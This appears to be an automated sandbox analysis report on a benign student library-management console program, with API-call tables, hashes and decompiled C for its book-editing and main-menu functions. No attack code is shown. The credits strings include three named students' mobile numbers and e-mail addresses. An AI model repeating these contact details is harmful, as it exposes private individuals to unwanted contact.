                                                  0x00b18379
                                                  0x00b1837b
                                                  0x00b183b7
                                                  0x00b183c7
                                                  0x00b183d1
                                                  0x00b183d8
                                                  0x00b183e0
                                                  0x00b183f5
                                                  0x00b18401
                                                  0x00b18409
                                                  0x00b1841e
                                                  0x00b18425
                                                  0x00b1842d
                                                  0x00b18442
                                                  0x00b1844e
                                                  0x00b18456
                                                  0x00b1846b
                                                  0x00b18472
                                                  0x00b1847a
                                                  0x00b1848f
                                                  0x00b1849b
                                                  0x00b184a3
                                                  0x00b184b8
                                                  0x00b184bf
                                                  0x00b184c7
                                                  0x00b184dc
                                                  0x00b184e8
                                                  0x00b184f0
                                                  0x00b18505
                                                  0x00b18507
                                                  0x00b1850c
                                                  0x00b18514
                                                  0x00b18529
                                                  0x00b18535
                                                  0x00b18548
                                                  0x00b1837d
                                                  0x00b1837d
                                                  0x00b18392
                                                  0x00b18394
                                                  0x00b18399
                                                  0x00b183a1
                                                  0x00b183a6
                                                  0x00b183b3
                                                  0x00b183b3

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,74B05060,74B60170,00000000,?,?,00B1A3FE), ref: 00B1806F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,00B1A3FE), ref: 00B18078
                                                  • GetStdHandle.KERNEL32(000000F5,00B1A3FE), ref: 00B18099
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1809C
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B180BD
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B180C0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B180E1
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B180E4
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18105
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18108
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18129
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1812C
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1814D
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18150
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18171
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18174
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18195
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18198
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B181B9
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B181BC
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B181DD
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B181E0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18201
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18204
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18225
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18228
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18249
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1824C
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1826D
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18270
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18291
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18294
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B182B5
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B182B8
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B182D9
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B182DC
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B182FD
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18300
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18337
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1833A
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1835B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1835E
                                                    • Part of subcall function 00B17FF0: __fread_nolock.LIBCMT ref: 00B1800D
                                                    • Part of subcall function 00B17FF0: __fread_nolock.LIBCMT ref: 00B18037
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1838F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18392
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,00000000,?,?,00B17DEB), ref: 00B1A50F
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,00B17DEB), ref: 00B1A512
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B17DEB), ref: 00B1A533
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,00B17DEB), ref: 00B1A536
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,00B17DEB), ref: 00B1A557
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,00B17DEB), ref: 00B1A55A
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,00B17DEB), ref: 00B1A57B
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,00B17DEB), ref: 00B1A57E
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A59F
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5A2
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5C3
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5C6
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5E7
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5EA
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A60B
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A60E
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A62F
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A632
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A653
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A656
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B183CE
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B183D1
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B183F2
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B183F5
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1841B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1841E
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1843F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18442
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18468
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1846B
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1848C
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1848F
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B184B5
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B184B8
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B184D9
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B184DC
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18502
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18505
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18526
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18529
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$__fread_nolock
                                                  • String ID: Author:$Book ID:$Book Name:$Category:$Enter the Information Below$Price:$Quantity:$Rack No:
                                                  • API String ID: 2024444707-676866286
                                                  • Opcode ID: 62b3bd045547f9ad9fb0ac039b786c7af3ed876f7094c98a7eaf5f02d1fb831d
                                                  • Instruction ID: f1a33b6fa3376e9cf87cde536dbd6c97b57f9a4c22728986aec1ef4b2cbd74c9
                                                  • Opcode Fuzzy Hash: 62b3bd045547f9ad9fb0ac039b786c7af3ed876f7094c98a7eaf5f02d1fb831d
                                                  • Instruction Fuzzy Hash: 9EA1E7B288919876CA30BBE2FC0ED8A3D5CDB48768B124295F128433F1DEB55445DF76
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B18580, Relevance: 77.2, APIs: 28, Strings: 16, Instructions: 237COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 79%
                                                  			E00B18580(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t6;
				void* _t17;
				void* _t23;
				void* _t28;
				void* _t29;
				void* _t67;
				void* _t69;
				void* _t70;
				void* _t72;
				void* _t73;
				intOrPtr _t74;
				void* _t75;
				void* _t77;
				void* _t80;
				void* _t85;
				void* _t104;

				_t70 = __edx;
				_t69 = __ecx;
				_t71 = GetStdHandle;
				0xb27e6c->X = 0x40014;
				_v8 = 0;
				_t6 = GetStdHandle(0xfffffff5);
				_t68 = SetConsoleCursorPosition;
				SetConsoleCursorPosition(_t6, 0xb27e6c->X);
				E00AE3965(SetConsoleCursorPosition, _t70, GetStdHandle, _t72);
				E00AD1080(_t69, "****Edit Books Section****", "cls");
				_t77 = _t75 + 8;
				_t73 = 0xf;
				do {
					E00AE3965(_t68, _t70, _t71, _t73);
					0xb27e6c->X = 0x6000f;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t69, "Enter Book Id to be edited:", "cls");
					E00AD10F0(_t69, 0xb22be0,  &_v12);
					 *0xb27ea0 = L00AD9D57("Bibek.dat", "rb+");
					_t17 = E00AF1525(0xb27ec0, 0x6c, 1, _t16);
					_t80 = _t77 + 0x28;
					_t102 = _t17 - 1;
					if(_t17 != 1) {
						goto L9;
					} else {
						goto L2;
					}
					do {
						L2:
						_push( *0xb27ea0);
						_t74 = _v12;
						E00AE3A34(_t70, _t102);
						_t28 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27ea0);
						_t85 = _t80 + 0x14;
						if(_t28 != 1) {
							L6:
							_t73 = 0xf;
							if(_v8 == 0) {
								0xb27e6c->X = 0x9000f;
								SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
								_push("No record found");
								E00AD1080(_t69);
								_t85 = _t85 + 4;
							}
							goto L8;
						}
						while(1) {
							_t104 =  *0xb27ec0 - _t74; // 0x0
							if(_t104 == 0) {
								break;
							}
							_t67 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27ea0);
							_t85 = _t85 + 0x10;
							if(_t67 == 1) {
								continue;
							}
							goto L6;
						}
						0xb27e6c->X = 0x7000f;
						_t73 = 0xf;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t69);
						0xb27e6c->X = 0x8000f;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t69, "The Book ID:%d",  *0xb27ec0);
						0xb27e6c->X = 0x9000f;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t69, "Enter new name:", "The book is availble");
						E00AD10F0(_t69, "%s", 0xb27ed8);
						0xb27e6c->X = 0xa000f;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t69);
						E00AD10F0(_t69, "%s", 0xb27eec);
						0xb27e6c->X = 0xb000f;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t69, "Enter new quantity:", "Enter new Author:");
						E00AD10F0(_t69, 0xb22be0, 0xb27f00);
						0xb27e6c->X = 0xc000f;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t69);
						E00AD10F0(_t69, "%f", 0xb27f04);
						0xb27e6c->X = 0xd000f;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t69, "Enter new rackno:", "Enter new price:");
						E00AD10F0(_t69, 0xb22be0, 0xb27f0c);
						0xb27e6c->X = 0xe000f;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						_push("The record is modified");
						E00AD1080(_t69);
						E00ADA900(_t70,  *0xb27ea0, E00AD997E(_t70, __eflags,  *0xb27ea0) - 0x6c, 0);
						L00AE3D2F(0xb27ec0, 0x6c, 1,  *0xb27ea0);
						_push( *0xb27ea0);
						E00ADA516(_t69, _t70, __eflags);
						_t85 = _t85 + 0x70;
						_v8 = 1;
						L8:
						_t29 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27ea0);
						_t80 = _t85 + 0x10;
						_t107 = _t29 - 1;
					} while (_t29 == 1);
					L9:
					0xb27e6c->X = 0x10000f;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
					_push("Modify another Record?(Y/N)");
					E00AD1080(_t69);
					E00ADA436(_t69, _t70, L00AD9E7D(0));
					_t77 = _t80 + 0xc;
					_t23 = E00AF4817(_t70, _t73, _t107);
					_t108 = _t23 - 0x79;
				} while (_t23 == 0x79);
				_push(" Press ENTER to return to main menu");
				E00AD1080(_t69);
				do {
				} while (E00AF4817(_t70, _t73, _t108) != 0xd);
				return E00B1A4D0(_t68, _t69, _t70, _t71, _t73);
			}

























                                                  0x00b18580
                                                  0x00b18580
                                                  0x00b18589
                                                  0x00b1858f
                                                  0x00b1859f
                                                  0x00b185a8
                                                  0x00b185aa
                                                  0x00b185b1
                                                  0x00b185b8
                                                  0x00b185c5
                                                  0x00b185ca
                                                  0x00b185cd
                                                  0x00b185d2
                                                  0x00b185d7
                                                  0x00b185df
                                                  0x00b185f4
                                                  0x00b185fb
                                                  0x00b1860c
                                                  0x00b1862a
                                                  0x00b1862f
                                                  0x00b18634
                                                  0x00b18637
                                                  0x00b1863a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b18640
                                                  0x00b18640
                                                  0x00b18640
                                                  0x00b18646
                                                  0x00b18649
                                                  0x00b18660
                                                  0x00b18665
                                                  0x00b1866b
                                                  0x00b18698
                                                  0x00b1869c
                                                  0x00b186a1
                                                  0x00b186a3
                                                  0x00b186b8
                                                  0x00b186ba
                                                  0x00b186bf
                                                  0x00b186c4
                                                  0x00b186c4
                                                  0x00000000
                                                  0x00b186a1
                                                  0x00b18670
                                                  0x00b18670
                                                  0x00b18676
                                                  0x00000000
                                                  0x00000000
                                                  0x00b1868b
                                                  0x00b18690
                                                  0x00b18696
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b18696
                                                  0x00b1874e
                                                  0x00b18758
                                                  0x00b18768
                                                  0x00b1876f
                                                  0x00b18777
                                                  0x00b1878c
                                                  0x00b18799
                                                  0x00b187a1
                                                  0x00b187b6
                                                  0x00b187bd
                                                  0x00b187cf
                                                  0x00b187d7
                                                  0x00b187ec
                                                  0x00b187f3
                                                  0x00b18805
                                                  0x00b1880d
                                                  0x00b18822
                                                  0x00b18829
                                                  0x00b1883b
                                                  0x00b18843
                                                  0x00b18858
                                                  0x00b1885f
                                                  0x00b18871
                                                  0x00b18879
                                                  0x00b1888e
                                                  0x00b18895
                                                  0x00b188a7
                                                  0x00b188af
                                                  0x00b188c4
                                                  0x00b188c6
                                                  0x00b188cb
                                                  0x00b188ed
                                                  0x00b18904
                                                  0x00b18909
                                                  0x00b1890f
                                                  0x00b18914
                                                  0x00b18917
                                                  0x00b186c7
                                                  0x00b186d6
                                                  0x00b186db
                                                  0x00b186de
                                                  0x00b186de
                                                  0x00b186e7
                                                  0x00b186e7
                                                  0x00b186fc
                                                  0x00b186fe
                                                  0x00b18703
                                                  0x00b18716
                                                  0x00b1871b
                                                  0x00b1871e
                                                  0x00b18723
                                                  0x00b18723
                                                  0x00b1872b
                                                  0x00b18730
                                                  0x00b18738
                                                  0x00b1873d
                                                  0x00b1874d

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,?,00B17DEB), ref: 00B185A8
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,00B17DEB), ref: 00B185B1
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B185F1
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B185F4
                                                  • __fread_nolock.LIBCMT ref: 00B1862F
                                                  • __fread_nolock.LIBCMT ref: 00B18660
                                                  • __fread_nolock.LIBCMT ref: 00B1868B
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B186B5
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B186B8
                                                  • __fread_nolock.LIBCMT ref: 00B186D6
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B186F9
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B186FC
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18765
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18768
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18789
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1878C
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B187B3
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B187B6
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B187E9
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B187EC
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1881F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18822
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18855
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18858
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1888B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1888E
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B188C1
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B188C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$__fread_nolock
                                                  • String ID: Press ENTER to return to main menu$****Edit Books Section****$Bibek.dat$Enter Book Id to be edited:$Enter new Author:$Enter new name:$Enter new price:$Enter new quantity:$Enter new rackno:$Modify another Record?(Y/N)$No record found$The Book ID:%d$The book is availble$The record is modified$cls$rb+
                                                  • API String ID: 2024444707-2438754467
                                                  • Opcode ID: 5ad82cb2c4b17ce7f2ca994789b198208daf2e73e0dabaf67dd7923147657702
                                                  • Instruction ID: b54bfd46435dc47e8404289d96a9c440031ef0e2a01d98dc490b90f45dde2d70
                                                  • Opcode Fuzzy Hash: 5ad82cb2c4b17ce7f2ca994789b198208daf2e73e0dabaf67dd7923147657702
                                                  • Instruction Fuzzy Hash: 6A712AB2988254BADB20B7E0BC07FAA3699DB04B18F0541D0F119123F2DEF65D548B7B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B1A4D0, Relevance: 63.3, APIs: 24, Strings: 12, Instructions: 277COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 20%
                                                  			E00B1A4D0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v12;
				signed int _t50;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t60;
				void* _t63;
				signed int _t68;
				signed int _t69;
				void* _t70;
				void* _t84;
				signed int _t86;

				_t58 = __edx;
				_t57 = __ecx;
				_t55 = __ebx;
				_t69 = _t68 & 0xfffffff8;
				_t86 = _t69;
				_t70 = _t69 - 0xc;
				_push(__ebx);
				_push(__esi);
				_t63 = SetConsoleCursorPosition;
				_push(__edi);
				_t60 = GetStdHandle;
				while(1) {
					E00AE3965(_t55, _t58, _t60, _t63);
					0xb27e6c->X = 0x30014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t57, 0xb2286c, "cls");
					0xb27e6c->X = 0x50014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t57);
					0xb27e6c->X = 0x70014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t57, 0xb228ac, 0xb22894);
					0xb27e6c->X = 0x90014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t57);
					0xb27e6c->X = 0xb0014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t57, 0xb228dc, 0xb228c4);
					0xb27e6c->X = 0xd0014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t57);
					0xb27e6c->X = 0xf0014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t57, 0xb2290c, 0xb228f4);
					0xb27e6c->X = 0x110014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t57);
					0xb27e6c->X = 0x130014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t57, 0xb22944, 0xb22928);
					0xb27e6c->X = 0x140014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AF0952(_t57, _t58, _t86,  &_v12);
					E00AD1080(_t57, "Date and time:%s\n", E00AF102C(_t55, _t58, _t60, _t63,  &_v12));
					0xb27e6c->X = 0x150014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					_push("Enter your choice:");
					E00AD1080(_t57);
					_t84 = _t70 + 0x3c;
					_t50 = E00AF4817(_t58, _t63, _t86) + 0xffffffcf;
					_t87 = _t50 - 6;
					if(_t50 <= 6) {
						break;
					}
					0xb27e6c->X = 0x17000a;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					_push(0xb22af0);
					E00AD1080(_t57);
					_t70 = _t84 + 4;
					_t54 = E00AF4817(_t58, _t63, _t87);
					if(_t54 != 0) {
						continue;
					} else {
						return _t54;
					}
					L15:
				}
				switch( *((intOrPtr*)(_t50 * 4 +  &M00B1A8A4))) {
					case 0:
						__eax = E00B1A230(__ecx, __edx, __eflags);
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
						goto L15;
					case 1:
						__eax = L00B19EE0(__ecx, __edx, __eflags);
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
						goto L15;
					case 2:
						__eax = E00B19650(__ecx, __edx, __eflags);
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
						goto L15;
					case 3:
						__eax = L00B18C00(__ecx, __edx, __eflags);
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
						goto L15;
					case 4:
						__eax = E00B18930(__ecx, __edx, __eflags);
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
						goto L15;
					case 5:
						__eax = E00B18580(__ecx, __edx, __eflags);
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
						goto L15;
					case 6:
						_push("cls");
						__eax = E00AE3965(__ebx, __edx, __edi, __esi);
						__esp = __esp + 4;
						0xb27e6c->X = 0x30010;
						_push(0xb27e6c->X);
						_push(0xfffffff5);
						 *__edi() =  *__esi();
						__eax = E00AD1080(__ecx, "Programmers....", __eax);
						__esp = __esp + 4;
						0xb27e6c->X = 0x40010;
						_push(0xb27e6c->X);
						_push(0xfffffff5);
						 *__edi() =  *__esi();
						__eax = E00AD1080(__ecx, "1. Bibek Subedi       (066/BCT/506)", __eax);
						__esp = __esp + 4;
						0xb27e6c->X = 0x50010;
						_push(0xb27e6c->X);
						_push(0xfffffff5);
						 *__edi() =  *__esi();
						__eax = E00AD1080(__ecx, "   Mobile:9846311430  E-mail:subedi_bibek@yahoo.co.in", __eax);
						__esp = __esp + 4;
						0xb27e6c->X = 0x70010;
						_push(0xb27e6c->X);
						_push(0xfffffff5);
						 *__edi() =  *__esi();
						__eax = E00AD1080(__ecx, "2. Dinesh Subedi      (066/BCT/512)", __eax);
						__esp = __esp + 4;
						0xb27e6c->X = 0x80010;
						_push(0xb27e6c->X);
						_push(0xfffffff5);
						 *__edi() =  *__esi();
						__eax = E00AD1080(__ecx, "   Mobile:9841569394  E-mail:smokindinesh@gmail.com", __eax);
						__esp = __esp + 4;
						0xb27e6c->X = 0xa0010;
						_push(0xb27e6c->X);
						_push(0xfffffff5);
						 *__edi() =  *__esi();
						__eax = E00AD1080(__ecx, "3. Sijan Bhandari      (066/BCT/537)", __eax);
						__esp = __esp + 4;
						0xb27e6c->X = 0xb0010;
						_push(0xb27e6c->X);
						_push(0xfffffff5);
						 *__edi() =  *__esi();
						__eax = E00AD1080(__ecx, "   Mobile:9849516774   E-mail:sijan_nasa@yahoo.com", __eax);
						__esp = __esp + 4;
						0xb27e6c->X = 0xd0010;
						_push(0xb27e6c->X);
						_push(0xfffffff5);
						 *__edi() =  *__esi();
						__eax = E00AD1080(__ecx, "With  the Unexplainable Help of Mr.Ashok Basnet", __eax);
						__esp = __esp + 4;
						0xb27e6c->X = 0x11000a;
						_push( *0xb27e6c);
						_push(0xfffffff5);
						 *__edi() =  *__esi();
						__eax = E00AD1080(__ecx, "Exiting in 3 second...........>", __eax);
						__esp = __esp + 4;
						_t5 = E00AD9A54(__edx) + 0xbb8; // 0xbb8
						__esi = _t5;
						do {
							__eax = E00AD9A54(__edx);
							__eflags = __esi - __eax;
						} while (__esi > __eax);
						__eax = E00AD91C2(0);
						asm("lock cmpsb");
						asm("cld");
						asm("cmpsb");
						 *(__edi - 0x58ebff4f) =  *(__edi - 0x58ebff4f) | __ah;
						 *(__edi - 0x58d3ff4f) =  *(__edi - 0x58d3ff4f) & __ah;
						__eflags =  *((intOrPtr*)(__edi + 0x3be800b1)) - __ah;
						__eax = E00B17B00(__eflags); // executed
						E00AF4817(__edx, __esi, __eflags) = 0;
						__eflags = 0;
						return 0;
						goto L15;
				}
			}















                                                  0x00b1a4d0
                                                  0x00b1a4d0
                                                  0x00b1a4d0
                                                  0x00b1a4d3
                                                  0x00b1a4d3
                                                  0x00b1a4d6
                                                  0x00b1a4d9
                                                  0x00b1a4da
                                                  0x00b1a4db
                                                  0x00b1a4e1
                                                  0x00b1a4e2
                                                  0x00b1a4f0
                                                  0x00b1a4f5
                                                  0x00b1a4fd
                                                  0x00b1a512
                                                  0x00b1a519
                                                  0x00b1a521
                                                  0x00b1a536
                                                  0x00b1a53d
                                                  0x00b1a545
                                                  0x00b1a55a
                                                  0x00b1a561
                                                  0x00b1a569
                                                  0x00b1a57e
                                                  0x00b1a585
                                                  0x00b1a58d
                                                  0x00b1a5a2
                                                  0x00b1a5a9
                                                  0x00b1a5b1
                                                  0x00b1a5c6
